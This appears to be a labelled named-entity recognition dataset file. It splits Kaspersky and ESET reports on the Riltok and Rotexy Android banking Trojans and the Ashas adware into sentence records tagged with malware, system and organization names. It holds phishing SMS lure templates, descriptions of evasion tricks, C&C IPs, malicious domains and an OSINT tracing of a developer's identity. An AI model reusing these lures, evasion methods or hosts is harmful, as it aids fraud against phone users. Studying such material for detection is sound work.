{"text": "Riltok mobile Trojan : A banker with global reach 25 JUN 2019 Riltok is one of numerous families of mobile banking Trojans with standard ( for such malware ) functions and distribution methods .", "spans": {"Malware: Riltok": [[0, 6], [62, 68]]}, "info": {"id": "cyner_valid_000000", "source": "cyner_valid"}}
{"text": "Originally intended to target the Russian audience , the banker was later adapted , with minimal modifications , for the European “ market. ” The bulk of its victims ( more than 90 % ) reside in Russia , with France in second place ( 4 % ) .", "spans": {}, "info": {"id": "cyner_valid_000001", "source": "cyner_valid"}}
{"text": "Third place is shared by Italy , Ukraine , and the United Kingdom .", "spans": {}, "info": {"id": "cyner_valid_000002", "source": "cyner_valid"}}
{"text": "We first detected members of this family back in March 2018 .", "spans": {}, "info": {"id": "cyner_valid_000003", "source": "cyner_valid"}}
{"text": "Like many other bankers , they were disguised as apps for popular free ad services in Russia .", "spans": {}, "info": {"id": "cyner_valid_000004", "source": "cyner_valid"}}
{"text": "The malware was distributed from infected devices via SMS in the form “ % USERNAME % , I ’ ll buy under a secure transaction .", "spans": {}, "info": {"id": "cyner_valid_000005", "source": "cyner_valid"}}
{"text": "] ru/7 * * * * * 3 ” or “ % USERNAME % , accept 25,000 on Youla youla-protect [ .", "spans": {}, "info": {"id": "cyner_valid_000007", "source": "cyner_valid"}}
{"text": "] ru/4 * * * * * 7 ” , containing a link to download the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000008", "source": "cyner_valid"}}
{"text": "Other samples were also noticed , posing as a client of a ticket-finding service or as an app store for Android .", "spans": {"System: Android": [[104, 111]]}, "info": {"id": "cyner_valid_000009", "source": "cyner_valid"}}
{"text": "It was late 2018 when Riltok climbed onto the international stage .", "spans": {"Malware: Riltok": [[22, 28]]}, "info": {"id": "cyner_valid_000010", "source": "cyner_valid"}}
{"text": "The cybercriminals behind it kept the same masking and distribution methods , using names and icons imitating those of popular free ad services .", "spans": {}, "info": {"id": "cyner_valid_000011", "source": "cyner_valid"}}
{"text": "The SMS message with a link to a banker looked as follows : “ % USERNAME % , i send you prepayment gumtree [ .", "spans": {}, "info": {"id": "cyner_valid_000013", "source": "cyner_valid"}}
{"text": "] cc/3 * * * * * 1 ” .", "spans": {}, "info": {"id": "cyner_valid_000014", "source": "cyner_valid"}}
{"text": "Italian ( Subito.apk ) and French ( Leboncoin.apk ) versions appeared shortly afterwards in January 2019 .", "spans": {}, "info": {"id": "cyner_valid_000015", "source": "cyner_valid"}}
{"text": "The messages looked as follows : “ % USERNAME % , ti ho inviato il soldi sul subito subito-a [ .", "spans": {}, "info": {"id": "cyner_valid_000016", "source": "cyner_valid"}}
{"text": "] pw/6 * * * * * 5 ” ( It .", "spans": {}, "info": {"id": "cyner_valid_000017", "source": "cyner_valid"}}
{"text": ") “ % USERNAME % , ti ho inviato il pagamento subitop [ .", "spans": {}, "info": {"id": "cyner_valid_000018", "source": "cyner_valid"}}
{"text": ") “ % USERNAME % , je vous ai envoyé un prepaiement m-leboncoin [ .", "spans": {}, "info": {"id": "cyner_valid_000020", "source": "cyner_valid"}}
{"text": "] top/7 * * * * * 3 ” ( Fr .", "spans": {}, "info": {"id": "cyner_valid_000021", "source": "cyner_valid"}}
{"text": ") “ % USERNAME % , j ’ ai fait l ’ avance ( suivi d ’ un lien ) : leboncoin-le [ .", "spans": {}, "info": {"id": "cyner_valid_000022", "source": "cyner_valid"}}
{"text": "] com/8 * * * * * 9 ” ( Fr .", "spans": {}, "info": {"id": "cyner_valid_000023", "source": "cyner_valid"}}
{"text": "Infection The user receives an SMS with a malicious link pointing to a fake website simulating a popular free ad service .", "spans": {}, "info": {"id": "cyner_valid_000025", "source": "cyner_valid"}}
{"text": "There , they are prompted to download a new version of the mobile app , under which guise the Trojan is hidden .", "spans": {}, "info": {"id": "cyner_valid_000026", "source": "cyner_valid"}}
{"text": "To be installed , it needs the victim to allow installation of apps from unknown sources in the device settings .", "spans": {}, "info": {"id": "cyner_valid_000027", "source": "cyner_valid"}}
{"text": "During installation , Riltok asks the user for permission to use special features in AccessibilityService by displaying a fake warning : If the user ignores or declines the request , the window keeps opening ad infinitum .", "spans": {"Malware: Riltok": [[22, 28]]}, "info": {"id": "cyner_valid_000028", "source": "cyner_valid"}}
{"text": "After obtaining the desired rights , the Trojan sets itself as the default SMS app ( by independently clicking Yes in AccessibilityService ) , before vanishing from the device screen .", "spans": {}, "info": {"id": "cyner_valid_000029", "source": "cyner_valid"}}
{"text": "After enabling AccessibilityService , the malware sets itself as the default SMS app Now installed and having obtained the necessary permissions from the user , Riltok contacts its C & C server .", "spans": {"Malware: Riltok": [[161, 167]]}, "info": {"id": "cyner_valid_000030", "source": "cyner_valid"}}
{"text": "Phishing page from the French version of the Trojan Communication with C & C Riltok actively communicates with its C & C server .", "spans": {"Malware: Riltok": [[77, 83]]}, "info": {"id": "cyner_valid_000033", "source": "cyner_valid"}}
{"text": "First off , it registers the infected device in the administrative panel by sending a GET request to the relative address gate.php ( in later versions gating.php ) with the ID ( device identifier generated by the setPsuedoID function in a pseudo-random way based on the device IMEI ) and screen ( shows if the device is active , possible values are “ on ” , “ off ” , “ none ” ) parameters .", "spans": {}, "info": {"id": "cyner_valid_000034", "source": "cyner_valid"}}
{"text": "Then , using POST requests to the relative address report.php , it sends data about the device ( IMEI , phone number , country , mobile operator , phone model , availability of root rights , OS version ) , list of contacts , list of installed apps , incoming SMS , and other information .", "spans": {}, "info": {"id": "cyner_valid_000035", "source": "cyner_valid"}}
{"text": "From the server , the Trojan receives commands ( for example , to send SMS ) and changes in the configuration .", "spans": {}, "info": {"id": "cyner_valid_000036", "source": "cyner_valid"}}
{"text": "Trojan anatomy The family was named Riltok after the librealtalk-jni.so library contained in the APK file of the Trojan .", "spans": {"Malware: Riltok": [[36, 42]]}, "info": {"id": "cyner_valid_000037", "source": "cyner_valid"}}
{"text": "The library includes such operations as : Get address of cybercriminal C & C server Get configuration file with web injects from C & C , as well as default list of injects Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps Set malware as default SMS app Get address of the phishing page that opens when the app runs , and others getStartWebUrl function – get address of phishing page The configuration file contains a list of injects for mobile banking apps – links to phishing pages matching the mobile", "spans": {}, "info": {"id": "cyner_valid_000038", "source": "cyner_valid"}}
{"text": "banking app used by the user .", "spans": {}, "info": {"id": "cyner_valid_000039", "source": "cyner_valid"}}
{"text": "In most so-called Western versions of the Trojan , the package names in the default configuration file are erased .", "spans": {}, "info": {"id": "cyner_valid_000040", "source": "cyner_valid"}}
{"text": "Depending on which app ( package name ) generated the event , Riltok can : Open a fake Google Play screen requesting bank card details Open a fake screen or phishing page in a browser ( inject ) mimicking the screen of the relevant mobile banking app and requesting user/bank card details Minimize the app ( for example , antivirus applications or device security settings ) Additionally , the Trojan can hide notifications from certain banking apps .", "spans": {"Malware: Riltok": [[62, 68]], "System: Google Play": [[87, 98]]}, "info": {"id": "cyner_valid_000042", "source": "cyner_valid"}}
{"text": "List of package names of apps on events from which the Trojan opens a fake Google Play window ( for the Russian version of the Trojan ) Example of Trojan screen overlapping other apps When bank card details are entered in the fake window , Riltok performs basic validation checks : card validity period , number checksum , CVC length , whether the number is in the denylist sewn into the Trojan code : Examples of phishing pages imitating mobile banks At the time of writing , the functionality of most of the Western versions of Riltok", "spans": {"System: Google Play": [[75, 86]]}, "info": {"id": "cyner_valid_000043", "source": "cyner_valid"}}
{"text": "was somewhat pared down compared to the Russian one .", "spans": {}, "info": {"id": "cyner_valid_000044", "source": "cyner_valid"}}
{"text": "Conclusion Threats are better prevented than cured , so do not follow suspicious links in SMS , and be sure to install apps only from official sources and check what permissions you are granting during installation .", "spans": {}, "info": {"id": "cyner_valid_000046", "source": "cyner_valid"}}
{"text": "As Riltok shows , cybercriminals can apply the same methods of infection to victims in different countries with more or less the same success .", "spans": {"Malware: Riltok": [[3, 9]]}, "info": {"id": "cyner_valid_000047", "source": "cyner_valid"}}
{"text": "Kaspersky products detect the above-described threat with the verdict Trojan-Banker.AndroidOS.Riltok .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "cyner_valid_000048", "source": "cyner_valid"}}
{"text": "IoCs C & C 100.51.100.00 108.62.118.131 172.81.134.165 172.86.120.207 185.212.128.152 185.212.128.192 185.61.000.108 185.61.138.108 185.61.138.37 188.209.52.101 5.206.225.57 alr992.date avito-app.pw backfround2.pw background1.xyz blacksolider93.com blass9g087.com brekelter2.com broplar3hf.xyz buy-youla.ru", "spans": {}, "info": {"id": "cyner_valid_000049", "source": "cyner_valid"}}
{"text": "cd78cg210xy0.com copsoiteess.com farmatefc93.org firstclinsop.com holebrhuhh3.com holebrhuhh45.com karambga3j.net le22999a.pw leboncoin-bk.top leboncoin-buy.pw leboncoin-cz.info leboncoin-f.pw leboncoin-jp.info leboncoin-kp.top leboncoin-ny.info leboncoin-ql.top leboncoin-tr.info", "spans": {}, "info": {"id": "cyner_valid_000050", "source": "cyner_valid"}}
{"text": "myyoula.ru sell-avito.ru sell-youla.ru sentel8ju67.com subito-li.pw subitop.pw web-gumtree.com whitehousejosh.com whitekalgoy3.com youlaprotect.ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa", "spans": {}, "info": {"id": "cyner_valid_000051", "source": "cyner_valid"}}
{"text": "54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745 bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811", "spans": {}, "info": {"id": "cyner_valid_000052", "source": "cyner_valid"}}
{"text": "e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting", "spans": {"System: Android": [[226, 233]]}, "info": {"id": "cyner_valid_000053", "source": "cyner_valid"}}
{"text": "millions of users 24 Oct 2019 - 11:30AM We detected a large adware campaign running for about a year , with the involved apps installed eight million times from Google Play alone .", "spans": {"System: Google Play": [[161, 172]]}, "info": {"id": "cyner_valid_000054", "source": "cyner_valid"}}
{"text": "We identified 42 apps on Google Play as belonging to the campaign , which had been running since July 2018 .", "spans": {"System: Google Play": [[25, 36]]}, "info": {"id": "cyner_valid_000055", "source": "cyner_valid"}}
{"text": "Of those , 21 were still available at the time of discovery .", "spans": {}, "info": {"id": "cyner_valid_000056", "source": "cyner_valid"}}
{"text": "We reported the apps to the Google security team and they were swiftly removed .", "spans": {}, "info": {"id": "cyner_valid_000057", "source": "cyner_valid"}}
{"text": "However , the apps are still available in third-party app stores .", "spans": {}, "info": {"id": "cyner_valid_000058", "source": "cyner_valid"}}
{"text": "ESET detects this adware , collectively , as Android/AdDisplay.Ashas .", "spans": {"Organization: ESET": [[0, 4]], "Malware: Android/AdDisplay.Ashas": [[45, 68]]}, "info": {"id": "cyner_valid_000059", "source": "cyner_valid"}}
{"text": "Apps of the Android/AdDisplay.Ashas family reported to Google by ESET Figure 2 .", "spans": {"Malware: Android/AdDisplay.Ashas": [[12, 35]], "Organization: ESET": [[65, 69]]}, "info": {"id": "cyner_valid_000061", "source": "cyner_valid"}}
{"text": "The most popular member of the Android/AdDisplay.Ashas family on Google Play was “ Video downloader master ” with over five million downloads Ashas functionality All the apps provide the functionality they promise , besides working as adware .", "spans": {"Malware: Android/AdDisplay.Ashas family": [[31, 61]], "System: Google Play": [[65, 76]], "Malware: Ashas": [[142, 147]]}, "info": {"id": "cyner_valid_000062", "source": "cyner_valid"}}
{"text": "[ Note : The analysis of the functionality below describes a single app , but applies to all apps of the Android/AdDisplay.Ashas family .", "spans": {"Malware: Android/AdDisplay.Ashas family": [[105, 135]]}, "info": {"id": "cyner_valid_000064", "source": "cyner_valid"}}
{"text": "] Once launched , the app starts to communicate with its C & C server ( whose IP address is base64-encoded in the app ) .", "spans": {}, "info": {"id": "cyner_valid_000065", "source": "cyner_valid"}}
{"text": "It sends “ home ” key data about the affected device : device type , OS version , language , number of installed apps , free storage space , battery status , whether the device is rooted and Developer mode enabled , and whether Facebook and FB Messenger are installed .", "spans": {"Organization: Facebook": [[228, 236]], "System: Messenger": [[244, 253]]}, "info": {"id": "cyner_valid_000066", "source": "cyner_valid"}}
{"text": "Sending information about the affected device The app receives configuration data from the C & C server , needed for displaying ads , and for stealth and resilience .", "spans": {}, "info": {"id": "cyner_valid_000068", "source": "cyner_valid"}}
{"text": "Configuration file received from the C & C server As for stealth and resilience , the attacker uses a number of tricks .", "spans": {}, "info": {"id": "cyner_valid_000070", "source": "cyner_valid"}}
{"text": "For this purpose , the app receives from the C & C server the isGoogleIp flag , which indicates whether the IP address of the affected device falls within the range of known IP addresses for Google servers .", "spans": {}, "info": {"id": "cyner_valid_000072", "source": "cyner_valid"}}
{"text": "If the server returns this flag as positive , the app will not trigger the adware payload .", "spans": {}, "info": {"id": "cyner_valid_000073", "source": "cyner_valid"}}
{"text": "Second , the app can set a custom delay between displaying ads .", "spans": {}, "info": {"id": "cyner_valid_000074", "source": "cyner_valid"}}
{"text": "This delay means that a typical testing procedure , which takes less than 10 minutes , will not detect any unwanted behavior .", "spans": {}, "info": {"id": "cyner_valid_000076", "source": "cyner_valid"}}
{"text": "Also , the longer the delay , the lower the risk of the user associating the unwanted ads with a particular app .", "spans": {}, "info": {"id": "cyner_valid_000077", "source": "cyner_valid"}}
{"text": "Third , based on the server response , the app can also hide its icon and create a shortcut instead .", "spans": {}, "info": {"id": "cyner_valid_000078", "source": "cyner_valid"}}
{"text": "If a typical user tries to get rid of the malicious app , chances are that only the shortcut ends up getting removed .", "spans": {}, "info": {"id": "cyner_valid_000079", "source": "cyner_valid"}}
{"text": "The app then continues to run in the background without the user ’ s knowledge .", "spans": {}, "info": {"id": "cyner_valid_000080", "source": "cyner_valid"}}
{"text": "Time delay to postpone displaying ads implemented by the adware Once the malicious app receives its configuration data , the affected device is ready to display ads as per the attacker ’ s choice ; each ad is displayed as a full screen activity .", "spans": {}, "info": {"id": "cyner_valid_000083", "source": "cyner_valid"}}
{"text": "The adware mimics these two apps to look legitimate and avoid suspicion – and thus stay on the affected device for as long as possible .", "spans": {}, "info": {"id": "cyner_valid_000085", "source": "cyner_valid"}}
{"text": "The adware activity impersonates Facebook ( left ) .", "spans": {"Organization: Facebook": [[33, 41]]}, "info": {"id": "cyner_valid_000087", "source": "cyner_valid"}}
{"text": "If the user long-presses the icon , the name of the app responsible for the activity is revealed ( right ) .", "spans": {}, "info": {"id": "cyner_valid_000088", "source": "cyner_valid"}}
{"text": "Finally , the Ashas adware family has its code hidden under the com.google.xxx package name .", "spans": {"Malware: Ashas": [[14, 19]]}, "info": {"id": "cyner_valid_000089", "source": "cyner_valid"}}
{"text": "This trick – posing as a part of a legitimate Google service – may help avoid scrutiny .", "spans": {"Organization: Google": [[46, 52]]}, "info": {"id": "cyner_valid_000090", "source": "cyner_valid"}}
{"text": "Some detection mechanisms and sandboxes may whitelist such package names , in an effort to prevent wasting resources .", "spans": {}, "info": {"id": "cyner_valid_000091", "source": "cyner_valid"}}
{"text": "Malicious code hidden in a package named “ com.google ” Hunting down the developer Using open-source information , we tracked down the developer of the adware , who we also identified as the campaign ’ s operator and owner of the C & C server .", "spans": {}, "info": {"id": "cyner_valid_000093", "source": "cyner_valid"}}
{"text": "In the following paragraphs , we outline our efforts to discover other applications from the same developer and protect our users from it .", "spans": {}, "info": {"id": "cyner_valid_000094", "source": "cyner_valid"}}
{"text": "Information about the C & C domain used by the Ashas adware Knowing that the information provided to a domain registrar might be fake , we continued our search .", "spans": {"Malware: Ashas": [[47, 52]]}, "info": {"id": "cyner_valid_000097", "source": "cyner_valid"}}
{"text": "The email address and country information drove us to a list of students attending a class at a Vietnamese university – corroborating the existence of the person under whose name the domain was registered .", "spans": {}, "info": {"id": "cyner_valid_000098", "source": "cyner_valid"}}
{"text": "A university class student list including the C & C domain registrant Due to poor privacy practices on the part of our culprit ’ s university , we now know his date of birth ( probably : he seemingly used his birth year as part of his Gmail address , as further partial confirmation ) , we know that he was a student and what university he attended .", "spans": {"System: Gmail": [[235, 240]]}, "info": {"id": "cyner_valid_000100", "source": "cyner_valid"}}
{"text": "We were also able to confirm that the phone number he provided to the domain registrar was genuine .", "spans": {}, "info": {"id": "cyner_valid_000101", "source": "cyner_valid"}}
{"text": "Moreover , we retrieved his University ID ; a quick googling showed some of his exam grades .", "spans": {}, "info": {"id": "cyner_valid_000102", "source": "cyner_valid"}}
{"text": "However , his study results are out of the scope of our research .", "spans": {}, "info": {"id": "cyner_valid_000103", "source": "cyner_valid"}}
{"text": "Based on our culprit ’ s email address , we were able to find his GitHub repository .", "spans": {"Organization: GitHub": [[66, 72]]}, "info": {"id": "cyner_valid_000104", "source": "cyner_valid"}}
{"text": "His repository proves that he is indeed an Android developer , but it contained no publicly available code of the Ashas adware at the time of writing of this blogpost .", "spans": {"System: Android": [[43, 50]], "Malware: Ashas": [[114, 119]]}, "info": {"id": "cyner_valid_000105", "source": "cyner_valid"}}
{"text": "However , a simple Google search for the adware package name returned a “ TestDelete ” project that had been available in his repository at some point The malicious developer also has apps in Apple ’ s App Store .", "spans": {"Organization: Google": [[19, 25]], "Organization: Apple": [[192, 197]], "System: App Store": [[202, 211]]}, "info": {"id": "cyner_valid_000106", "source": "cyner_valid"}}
{"text": "Some of them are iOS versions of the ones removed from Google Play , but none contain adware functionality .", "spans": {"System: iOS": [[17, 20]], "System: Google Play": [[55, 66]]}, "info": {"id": "cyner_valid_000107", "source": "cyner_valid"}}
{"text": "The malicious developer ’ s apps published on the App Store which don ’ t contain the Ashas adware Searching further for the malicious developer ’ s activities , we also discovered his Youtube channel propagating the Ashas adware and his other projects .", "spans": {"Malware: Ashas": [[86, 91], [217, 222]], "System: Youtube": [[185, 192]]}, "info": {"id": "cyner_valid_000109", "source": "cyner_valid"}}
{"text": "As for the Ashas family , one of the associated promotional videos , “ Head Soccer World Champion 2018 – Android , ios ” was viewed almost three million times and two others reached hundreds of thousands of views , as seen in Figure 11 .", "spans": {"Malware: Ashas": [[11, 16]], "System: Android": [[105, 112]], "System: ios": [[115, 118]]}, "info": {"id": "cyner_valid_000110", "source": "cyner_valid"}}
{"text": "YouTube channel of the malicious developer His YouTube channel provided us with another valuable piece of information : he himself features in a video tutorial for one of his other projects .", "spans": {"System: YouTube": [[0, 7], [47, 54]]}, "info": {"id": "cyner_valid_000112", "source": "cyner_valid"}}
{"text": "Facebook profile of the C & C domain registrar ( cover picture and profile picture edited out ) Linked on the malicious developer ’ s Facebook profile , we discovered a Facebook page , Minigameshouse , and an associated domain , minigameshouse [ .", "spans": {"Organization: Facebook": [[0, 8], [134, 142], [169, 177]]}, "info": {"id": "cyner_valid_000115", "source": "cyner_valid"}}
{"text": "This domain is similar to the one the malware author used for his adware C & C communication , minigameshouse [ .", "spans": {}, "info": {"id": "cyner_valid_000117", "source": "cyner_valid"}}
{"text": "Checking this Minigameshouse page further indicates that this person is indeed the owner of the minigameshouse [ .", "spans": {}, "info": {"id": "cyner_valid_000119", "source": "cyner_valid"}}
{"text": "] us domain : the phone number registered with this domain is the same as the phone number appearing on the Facebook page .", "spans": {"Organization: Facebook": [[108, 116]]}, "info": {"id": "cyner_valid_000120", "source": "cyner_valid"}}
{"text": "Facebook page managed by the C & C domain registrant uses the same base domain name ( minigameshouse ) and phone number as the registered malicious C & C used by the Ashas adware Of interest is that on the Minigameshouse Facebook page , the malicious developer promotes a slew of games beyond the Ashas family for download on both Google Play and the App Store .", "spans": {"Organization: Facebook": [[0, 8], [221, 229]], "Malware: Ashas": [[166, 171], [297, 302]], "System: Google Play": [[331, 342]], "System: App Store": [[351, 360]]}, "info": {"id": "cyner_valid_000122", "source": "cyner_valid"}}
{"text": "However , all of those have been removed from Google Play – despite the fact that some of them didn ’ t contain any adware functionality .", "spans": {"System: Google Play": [[46, 57]]}, "info": {"id": "cyner_valid_000123", "source": "cyner_valid"}}
{"text": "On top of all this , one of the malicious developer ’ s YouTube videos – a tutorial on developing an “ Instant Game ” for Facebook – serves as an example of operational security completely ignored .", "spans": {"System: YouTube": [[56, 63]], "Organization: Facebook": [[122, 130]]}, "info": {"id": "cyner_valid_000124", "source": "cyner_valid"}}
{"text": "We were able to see that his recently visited web sites were Google Play pages belonging to apps containing the Ashas adware .", "spans": {"System: Google Play": [[61, 72]], "Malware: Ashas adware": [[112, 124]]}, "info": {"id": "cyner_valid_000125", "source": "cyner_valid"}}
{"text": "He also used his email account to log into various services in the video , which identifies him as the adware domain owner , beyond any doubt .", "spans": {}, "info": {"id": "cyner_valid_000126", "source": "cyner_valid"}}
{"text": "Thanks to the video , we were even able to identify three further apps that contained adware functionality and were available on Google Play .", "spans": {"System: Google Play": [[129, 140]]}, "info": {"id": "cyner_valid_000127", "source": "cyner_valid"}}
{"text": "Screenshots from this developer ’ s YouTube video shows history of checking Ashas adware on Google Play ESET telemetry Figure 15 .", "spans": {"System: YouTube": [[36, 43]], "Malware: Ashas": [[76, 81]], "System: Google Play": [[92, 103]], "Organization: ESET": [[104, 108]]}, "info": {"id": "cyner_valid_000129", "source": "cyner_valid"}}
{"text": "ESET detections of Android/AdDisplay.Ashas on Android devices by country Is adware harmful ?", "spans": {"Organization: ESET": [[0, 4]], "Malware: Android/AdDisplay.Ashas": [[19, 42]]}, "info": {"id": "cyner_valid_000130", "source": "cyner_valid"}}
{"text": "Because the real nature of apps containing adware is usually hidden to the user , these apps and their developers should be considered untrustworthy .", "spans": {}, "info": {"id": "cyner_valid_000131", "source": "cyner_valid"}}
{"text": "When installed on a device , apps containing adware may , among other things : Annoy users with intrusive advertisements , including scam ads Waste the device ’ s battery resources Generate increased network traffic Gather users ’ personal information Hide their presence on the affected device to achieve persistence Generate revenue for their operator without any user interaction Conclusion Based solely on open source intelligence , we were able to trace the developer of the Ashas adware and establish his identity and discover additional related adware-infected apps .", "spans": {"Malware: Ashas": [[480, 485]]}, "info": {"id": "cyner_valid_000132", "source": "cyner_valid"}}
{"text": "Seeing that the developer did not take any measures to protect his identity , it seems likely that his intentions weren ’ t dishonest at first – and this is also supported by the fact that not all his published apps contained unwanted ads .", "spans": {}, "info": {"id": "cyner_valid_000133", "source": "cyner_valid"}}
{"text": "At some point in his Google Play “ career ” , he apparently decided to increase his ad revenue by implementing adware functionality in his apps ’ code .", "spans": {"System: Google Play": [[21, 32]]}, "info": {"id": "cyner_valid_000134", "source": "cyner_valid"}}
{"text": "We report them to Google and take other steps to disrupt malicious campaigns we discover .", "spans": {"Organization: Google": [[18, 24]]}, "info": {"id": "cyner_valid_000137", "source": "cyner_valid"}}
{"text": "Last but not least , we publish our findings to help Android users protect themselves .", "spans": {"System: Android": [[53, 60]]}, "info": {"id": "cyner_valid_000138", "source": "cyner_valid"}}
{"text": "MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast , ensuring that the app 's functionality will be activated every time the device starts Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads The Rotexy mobile Trojan – banker and ransomware 22 NOV 2018 On", "spans": {"Organization: MITRE": [[0, 5]], "System: Google Play": [[169, 180]], "Malware: Rotexy": [[491, 497]]}, "info": {"id": "cyner_valid_000139", "source": "cyner_valid"}}
{"text": "the back of a surge in Trojan activity , we decided to carry out an in-depth analysis and track the evolution of some other popular malware families besides Asacub .", "spans": {"Malware: Asacub": [[157, 163]]}, "info": {"id": "cyner_valid_000140", "source": "cyner_valid"}}
{"text": "One of the most interesting and active specimens to date was a mobile Trojan from the Rotexy family .", "spans": {"Malware: Rotexy": [[86, 92]]}, "info": {"id": "cyner_valid_000141", "source": "cyner_valid"}}
{"text": "In a three-month period from August to October 2018 , it launched over 70,000 attacks against users located primarily in Russia .", "spans": {}, "info": {"id": "cyner_valid_000142", "source": "cyner_valid"}}
{"text": "An interesting feature of this family of banking Trojans is the simultaneous use of three command sources : Google Cloud Messaging ( GCM ) service – used to send small messages in JSON format to a mobile device via Google servers ; malicious C & C server ; incoming SMS messages .", "spans": {}, "info": {"id": "cyner_valid_000143", "source": "cyner_valid"}}
{"text": "This ‘ versatility ’ was present in the first version of Rotexy and has been a feature of all the family ’ s subsequent representatives .", "spans": {"Malware: Rotexy": [[57, 63]]}, "info": {"id": "cyner_valid_000144", "source": "cyner_valid"}}
{"text": "During our research we also arrived at the conclusion that this Trojan evolved from an SMS spyware Trojan that was first spotted in October 2014 .", "spans": {}, "info": {"id": "cyner_valid_000145", "source": "cyner_valid"}}
{"text": "Back then it was detected as Trojan-Spy.AndroidOS.SmsThief , but later versions were assigned to another family – Trojan-Banker.AndroidOS.Rotexy .", "spans": {"Malware: Trojan-Spy.AndroidOS.SmsThief": [[29, 58]], "Malware: Trojan-Banker.AndroidOS.Rotexy": [[114, 144]]}, "info": {"id": "cyner_valid_000146", "source": "cyner_valid"}}
{"text": "These website names are generated according to a clear algorithm : the first few letters are suggestive of popular classified ad services , followed by a random string of characters , followed by a two-letter top-level domain .", "spans": {}, "info": {"id": "cyner_valid_000149", "source": "cyner_valid"}}
{"text": "Evolution of Rotexy 2014–2015 Since the malicious program was detected in 2014 , its main functions and propagation method have not changed : Rotexy spreads via links sent in phishing SMSs that prompt the user to install an app .", "spans": {"Malware: Rotexy": [[13, 19], [142, 148]]}, "info": {"id": "cyner_valid_000151", "source": "cyner_valid"}}
{"text": "Until mid-2015 , Rotexy used a plain-text JSON format to communicate with its C & C .", "spans": {"Malware: Rotexy": [[17, 23]]}, "info": {"id": "cyner_valid_000153", "source": "cyner_valid"}}
{"text": "For instance , the Trojan could automatically reply to an SMS and immediately delete it .", "spans": {}, "info": {"id": "cyner_valid_000155", "source": "cyner_valid"}}
{"text": "The algorithm for generating the lowest-level domain name was hardwired in the Trojan ’ s code .", "spans": {}, "info": {"id": "cyner_valid_000158", "source": "cyner_valid"}}
{"text": "The Trojan also registered in Google Cloud Messaging ( GCM ) , meaning it could then receive commands via that service .", "spans": {"System: Google Cloud Messaging ( GCM )": [[30, 60]]}, "info": {"id": "cyner_valid_000159", "source": "cyner_valid"}}
{"text": "The Trojan ’ s assets folder contained the file data.db with a list of possible values for the User-Agent field for the PAGE command ( which downloads the specified webpage ) .", "spans": {}, "info": {"id": "cyner_valid_000161", "source": "cyner_valid"}}
{"text": "If the value of this field failed to arrive from the C & C , it was selected from the file data.db using a pseudo-random algorithm .", "spans": {}, "info": {"id": "cyner_valid_000162", "source": "cyner_valid"}}
{"text": "2015–2016 Starting from mid-2015 , the Trojan began using the AES algorithm to encrypt data communicated between the infected device and the C & C : Also starting with the same version , data is sent in a POST request to the relative address with the format “ / [ number ] ” ( a pseudo-randomly generated number in the range 0–9999 ) .", "spans": {}, "info": {"id": "cyner_valid_000163", "source": "cyner_valid"}}
{"text": "In some samples , starting from January 2016 , an algorithm has been implemented for unpacking the encrypted executable DEX file from the assets folder .", "spans": {}, "info": {"id": "cyner_valid_000164", "source": "cyner_valid"}}
{"text": "In this version of Rotexy , dynamic generation of lowest-level domains was not used .", "spans": {"Malware: Rotexy": [[19, 25]]}, "info": {"id": "cyner_valid_000165", "source": "cyner_valid"}}
{"text": "No other significant changes were observed in the Trojan ’ s network behavior .", "spans": {}, "info": {"id": "cyner_valid_000167", "source": "cyner_valid"}}
{"text": "In late 2016 , versions of the Trojan emerged that contained the card.html phishing page in the assets/www folder .", "spans": {}, "info": {"id": "cyner_valid_000168", "source": "cyner_valid"}}
{"text": "The page was designed to steal users ’ bank card details : 2017–2018 From early 2017 , the HTML phishing pages bank.html , update.html and extortionist.html started appearing in the assets folder .", "spans": {}, "info": {"id": "cyner_valid_000169", "source": "cyner_valid"}}
{"text": "Also , in some versions of the Trojan the file names were random strings of characters .", "spans": {}, "info": {"id": "cyner_valid_000170", "source": "cyner_valid"}}
{"text": "In 2018 , versions of Rotexy emerged that contacted the C & C using its IP address .", "spans": {"Malware: Rotexy": [[22, 28]]}, "info": {"id": "cyner_valid_000171", "source": "cyner_valid"}}
{"text": "‘ One-time ’ domains also appeared with names made up of random strings of characters and numbers , combined with the top-level domains .cf , .ga , .gq , .ml , or .tk .", "spans": {}, "info": {"id": "cyner_valid_000172", "source": "cyner_valid"}}
{"text": "At this time , the Trojan also began actively using different methods of obfuscation .", "spans": {}, "info": {"id": "cyner_valid_000173", "source": "cyner_valid"}}
{"text": "For example , the DEX file is packed with garbage strings and/or operations , and contains a key to decipher the main executable file from the APK .", "spans": {}, "info": {"id": "cyner_valid_000174", "source": "cyner_valid"}}
{"text": "Application launch When launching for the first time , the Trojan checks if it is being launched in an emulation environment , and in which country it is being launched .", "spans": {}, "info": {"id": "cyner_valid_000176", "source": "cyner_valid"}}
{"text": "If the device is located outside Russia or is an emulator , the application displays a stub page : In this case , the Trojan ’ s logs contain records in Russian with grammatical errors and spelling mistakes : If the check is successful , Rotexy registers with GCM and launches SuperService which tracks if the Trojan has device administrator privileges .", "spans": {"Malware: Rotexy": [[238, 244]], "System: GCM": [[260, 263]]}, "info": {"id": "cyner_valid_000177", "source": "cyner_valid"}}
{"text": "SuperService also tracks its own status and relaunches if stopped .", "spans": {}, "info": {"id": "cyner_valid_000178", "source": "cyner_valid"}}
